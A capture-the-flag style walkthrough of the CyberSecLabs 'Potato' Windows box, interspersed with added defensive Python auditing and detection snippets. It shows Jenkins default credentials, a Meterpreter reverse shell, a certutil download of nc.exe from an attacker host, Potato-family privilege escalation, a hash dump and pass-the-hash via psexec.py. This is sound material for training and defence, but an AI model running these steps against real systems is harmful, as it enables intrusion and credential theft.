NMAP ENUM
sudo nmap -O -A -p- 172.31.1.19
kali@kali:~/cyberseclabs$ nmap 172.31.1.19
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 10:33 EDT
Nmap scan report for 172.31.1.19
Host is up (0.10s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
8080/tcp  open  http-proxy
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49163/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds
On port 8080 we get a Jenkins login page. Let's try some default credentials, the good old admin:admin…
Step 2: Exploitation
Browsing around the console and doing some clicking around, I had no idea what I was looking for. Then I saw a script console, and that started to stir up some evil thoughts about how I could exploit this thing. Some googling turned up a Metasploit module that exploits it through Java code execution. The same exploit can also be done manually, without Metasploit's spoon-feeding, by entering the commands to execute in the console.
Exploit: https://www.rapid7.com/db/modules/exploit/multi/http/jenkins_script_console
Let’s now fire up Metasploit from our terminal and use the exploit module following the commands in order:
msfconsole
use exploit/multi/http/jenkins_script_console
set RHOSTS 172.31.1.19
set RPORT 8080
set TARGETURI /script/
set USERNAME admin
set PASSWORD admin
By default this module uses the reverse_https payload for the connection back. I switched to reverse_tcp for consistency.
set payload windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT 7777
run
The exploit runs and gives us back a Meterpreter session. I typed the ‘shell’ command to get a full command shell.
C:\Users\ben\Desktop>type access.txt
type access.txt
11d92ba4a09c10adf0eb3636ad4c57e5

C:\Users\ben\Desktop>
Step 3: Post Exploitation
I ran ‘whoami /priv’ to see if this thing was vulnerable to the Juicy Potato exploit.
C:\Users\ben\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\Users\ben\Desktop>
We can see that SeImpersonatePrivilege is Enabled. This means we can use the famous Juicy Potato attack.
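The privilege check above is just as useful from the defender's side: auditing which service accounts hold impersonation privileges tells you where the Potato family would work before anyone runs it. This is an added example, not part of the original writeup; the sample input is the ‘whoami /priv’ output shown above, and the privilege list is my own selection.

```python
import re

# Privileges that let a process acquire another security context. A low-privilege
# service account holding any of these is the precondition the Potato family abuses.
TOKEN_PRIVS = {
    "SeImpersonatePrivilege": "can impersonate clients (Juicy/Rotten Potato precondition)",
    "SeAssignPrimaryTokenPrivilege": "can assign a primary token to a new process",
    "SeDebugPrivilege": "can open any process, including SYSTEM ones",
    "SeBackupPrivilege": "can read any file regardless of its ACL (SAM/SYSTEM hives)",
}

# One privilege row: name, free-text description, then Enabled/Disabled.
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")

# Sample input taken from the writeup's whoami /priv output.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

def parse_whoami_priv(text):
    """Return {privilege_name: state} parsed from 'whoami /priv' output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def audit_privileges(text):
    """List (privilege, state, why it matters) for every held privilege in TOKEN_PRIVS.
    A privilege that is present but Disabled is still reported: the process can
    re-enable it with AdjustTokenPrivileges, so 'Disabled' is not a mitigation."""
    privs = parse_whoami_priv(text)
    return [(n, s, TOKEN_PRIVS[n]) for n, s in privs.items() if n in TOKEN_PRIVS]

def is_impersonation_capable(text):
    """True when the token holds either privilege that enables token-impersonation abuse."""
    privs = parse_whoami_priv(text)
    return bool({"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"} & set(privs))
```

Run it against ‘whoami /priv’ output collected from each service account (Jenkins, IIS app pools, SQL Server) and move anything that is flagged to a virtual/managed service account or strip the privilege via the service's own configuration.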
I found a Juicy Potato exploit module for Metasploit. While still in the basic command shell, press Ctrl-Z to background the session. Hit Y if it asks you to background it.
We are now dropped back to the main Metasploit prompt, and we can verify any sessions we have running in the background with the sessions command:
We can now then load the Juicy Potato exploit module using the following commands:
use exploit/windows/local/ms16_075_reflection_juicy
set SESSION 1
set LHOST <your ip>
run
Sadly, that was not working for me.
So we first transfer the Juicy Potato binary to the victim machine. You can get it from here. We also transfer nc.exe (Netcat for Windows) to the victim machine.
c:\users\ben>certutil -urlcache -split -f http://10.10.1.1/nc.exe nc.exe
Juicy Potato also requires a CLSID as an argument. You can find the list of CLSIDs for your OS version in the Juicy Potato GitHub repo. Using the ‘systeminfo’ command we can see that the machine is running Windows Server 2012.
Next, we create a batch file, rev.bat, with the following contents.
This simply means that when rev.bat is run, it will connect back to our local machine using nc.exe.
Now we use Juicy Potato. But before that, let's set up a netcat listener on our local machine.
Running Juicy Potato now:
Here,
- -p : Program to launch
- -t : CreateProcess call to use
- -l : COM server listen port
- -c : CLSID, as mentioned above. You can try any one from the list until it works.
Once this is completed, we get a shell back on our machine as NT Authority\system.
Again, not for me.
c:\puck>juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334}
juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334}
Testing {e60687f701a140aa-86ac-db1cbf673334} 6666
COM -> recv failed with error: 10038
Let's go rotten instead: RottenPotato plus Meterpreter's incognito extension.
meterpreter > upload /tmp/rottenpotato.exe .
[*] uploading  : /tmp/rottenpotato.exe -> .
[*] uploaded   : /tmp/rottenpotato.exe -> .\rottenpotato.exe
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > execute -Hc -f rottenpotato.exe
Process 952 created.
Channel 3 created.
meterpreter > execute -Hc -f rottenpotato.exe
Process 1952 created.
Channel 4 created.
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 7863-44CF

 Directory of c:\Users\Administrator\Desktop

05/16/2020  01:26 PM    <DIR>          .
05/16/2020  01:26 PM    <DIR>          ..
05/19/2020  11:54 AM                32 system.txt
               1 File(s)             32 bytes
               2 Dir(s)   8,087,158,784 bytes free

c:\Users\Administrator\Desktop>type system.txt
7b57e970b90d4244c5efa500b9dfe457

c:\Users\Administrator\Desktop>
c:\Users\Administrator\Desktop>^Z
Background channel 5? [y/N]  y
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223:::
ben:1009:aad3b435b51404eeaad3b435b51404ee:e549e5d2b2bf452ba959520eb82bdeeb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >
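A dump in this pwdump format is also what a defender reviews after an incident or a sanctioned credential audit, and the same three lines already show two things worth checking for: Guest carries the empty-password NT hash, and every account has the empty LM hash (good, LM storage is off). This is an added example, not from the writeup; it adds one constructed account (svc_backup) reusing the Administrator hash to exercise the password-reuse rule.

```python
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" : LM storage disabled, which is what you want
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" : the account has a blank password

# Sample input: the three accounts from the hashdump above plus one constructed
# account, svc_backup, that shares the Administrator NT hash.
SAMPLE_DUMP = """\
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223:::
ben:1009:aad3b435b51404eeaad3b435b51404ee:e549e5d2b2bf452ba959520eb82bdeeb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1010:aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223:::
meterpreter >
"""

def parse_pwdump(text):
    """Parse user:rid:lmhash:nthash::: lines; anything else (prompts, banners) is skipped."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts

def audit_pwdump(text):
    """Return (user, finding) pairs: blank passwords, LM hashes still stored,
    and NT hashes shared between accounts (one stolen hash then opens all of them)."""
    findings, first_seen = [], {}
    for a in parse_pwdump(text):
        if a["nt"] == EMPTY_NT:
            findings.append((a["user"], "empty password (normal only for a disabled Guest)"))
        if a["lm"] != EMPTY_LM:
            findings.append((a["user"], "LM hash stored: NoLMHash policy not enforced"))
        if a["nt"] != EMPTY_NT:
            if a["nt"] in first_seen:
                findings.append((a["user"], "same password as " + first_seen[a["nt"]]))
            else:
                first_seen[a["nt"]] = a["user"]
    return findings
```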
kali@kali:~/cyberseclabs$ python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223 administrator@172.31.1.19
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 172.31.1.19.....
[*] Found writable share ADMIN$
[*] Uploading file fJyPgVRp.exe
[*] Opening SVCManager on 172.31.1.19.....
[*] Creating service srVS on 172.31.1.19.....
[*] Starting service srVS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname &&whoami
Potato
nt authority\system

C:\Windows\system32>
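The psexec.py session above leaves a very recognisable trail on the target: a random-named executable uploaded to the ADMIN$ share (the root of C:\Windows) and a four-letter service created to run it, which the Service Control Manager records as System event 7045. As an added example (not part of the writeup), this scores such events as a SIEM rule would; the event dictionaries and the benign Sysmon64 and VendorAgent entries are constructed, while the first event mirrors the artifacts shown above.

```python
import re

# Constructed sample of System-log 7045 ("A service was installed") events, as a
# SIEM would present them. The first mirrors the psexec.py session above.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "srVS", "ImagePath": r"C:\Windows\fJyPgVRp.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Sysmon64", "ImagePath": r"C:\Windows\Sysmon64.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "VendorAgent", "ImagePath": r"C:\Program Files\Vendor\agent.exe", "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "Spooler", "ImagePath": "", "AccountName": ""},
]

# An .exe sitting directly in the Windows directory, i.e. dropped through ADMIN$.
SYSROOT_EXE = re.compile(r"^[A-Za-z]:\\Windows\\([^\\]+\.exe)$", re.IGNORECASE)

def case_switches(name):
    """Count adjacent letter pairs whose case differs; generated names like fJyPgVRp
    score high (6), real product names like Sysmon64 score low (1)."""
    letters = [c for c in name if c.isalpha()]
    return sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))

def score_service_install(ev):
    """Return (score, reasons) for one event; each PsExec-style indicator adds one point."""
    if ev.get("EventID") != 7045:
        return 0, []
    reasons = []
    m = SYSROOT_EXE.match(ev.get("ImagePath", "").strip('"'))
    if m:
        reasons.append("binary dropped directly in %SystemRoot% (ADMIN$ root)")
        if case_switches(m.group(1).rsplit(".", 1)[0]) >= 3:
            reasons.append("random-looking binary name")
    if len(ev.get("ServiceName", "")) <= 4:
        reasons.append("very short service name")
    return len(reasons), reasons

def find_suspicious(events, threshold=2):
    """Return (service name, reasons) for events scoring at or above the threshold.
    A single indicator (Sysmon64 also lives in C:\\Windows) is not enough on its own."""
    hits = []
    for ev in events:
        score, reasons = score_service_install(ev)
        if score >= threshold:
            hits.append((ev["ServiceName"], reasons))
    return hits
```

Pair the 7045 alert with Security event 4624 logon type 3 for the same source to see the SMB logon that carried the hash, and allowlist your legitimate deployment tools rather than lowering the threshold.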
Author – Puckiestyle